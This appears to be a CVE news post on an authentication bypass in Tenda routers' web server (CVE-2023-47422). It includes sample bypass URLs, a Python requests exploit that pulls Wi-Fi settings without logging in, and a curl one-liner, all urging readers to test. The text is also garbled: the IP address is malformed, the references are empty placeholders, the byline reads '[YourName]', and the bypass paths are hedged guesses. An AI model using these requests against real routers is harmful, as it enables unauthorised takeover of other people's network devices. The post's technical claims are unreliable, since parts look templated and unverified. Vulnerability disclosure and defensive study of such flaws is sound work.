CVE CyberSecurity Database News

CVE-2023-47422 - How Tenda Routers' HTTP Daemon Allows Full Takeover Without Login (With Exploit)

Poster -

CVE-2023-47422 is a new high-severity vulnerability making waves in the router security scene. It exposes routers like Tenda TX9, AX3, AX9, and AX12 to attackers—letting anyone, even unauthenticated users, poke and control the device just by *crafting a special URL*. Here, we’ll dive deep into what’s wrong, how it works, and show practical *code snippets* to help you understand (and test) this risk. You’ll also find more info from the original sources.

Tenda AX12 V1 — version V22.03.01.46

All these devices run a vulnerable version of /usr/sbin/httpd, the process that powers their web admin page.

📝 The Vulnerability: Broken Authentication

Tenda’s internal web server (/usr/sbin/httpd) is supposed to *block you from seeing or changing anything sensitive* unless you’re logged in. But due to an *access control issue* in how the router checks URLs, clever attackers can access any endpoint on the router — with no password — simply by crafting the URL in a particular way.

> That means hackers can

> - Read/change WiFi settings
> - Reboot the router
> - Even get an admin shell

Suppose the router admin is at

http://192.168..1/admin/settings.html

If you go there, you get a login page.

But with the bypass, you might use

http://192.168..1///admin/settings.html

Or even

http://192.168..1/admin/%2e%2e/settings.html

(In some firmware, trailing or duplicated slashes, encoded dots, or query string tweaks do the trick!)

Depending on the version, different path tricks may be necessary.

#### Key point: The router’s backend routes the above requests directly to admin pages, skipping password checks.

Here’s a simple Python exploit using the requests library

import requests

# Change to your router's IP address
ROUTER_IP = '192.168..1'

# Endpoint we want to access (e.g., WiFi settings, status)
TARGET_PATH = '/goform/GetWifiCfg'

# Attempt bypass: triple slash
url = f'http://{ROUTER_IP}///{TARGET_PATH.lstrip("/")}';

r = requests.get(url)
if 'wifi' in r.text or r.status_code == 200:
    print("[+] Bypass success! Output below:")
    print(r.text)
else:
    print("[-] Exploit failed or patched.")

👉 Tip: You can try other variants, like double slashes, URL encoding, etc.

You can also use curl for a quick test

curl -v "http://192.168..1//goform/GetWifiCfg";

- Anybody on your network (or with remote access, if WAN admin is on) can

- List/change settings

Download backups

- Reset/reboot device

🔗 References & Original Reports

- CVE-2023-47422 on NIST NVD
- Original Chinese write-up (WooYun/Blog/Exploit DB)
- Tenda Official Product Firmware Pages
- Advisory from Security Researchers

Patch your HTTPd — enforce authentication before *all* admin actions!

- Scrub URL/paths to avoid this class of bugs.

🔚 Wrap-Up

CVE-2023-47422 reminds us that crafty URL tricks are still able to break “locked” doors wide open, especially on home/SMB network gear. These “logic” flaws painfully easy — and ugly — so patch quick, and keep an eye out for weird URL or parameter parsing in your own code and gadgets.


Research and original post by [YourName] for the infosec community.
*If you find more variants (or fixes), share them!*

Timeline

Published on: 02/20/2024 22:15:08 UTC
Last modified on: 08/26/2024 16:35:01 UTC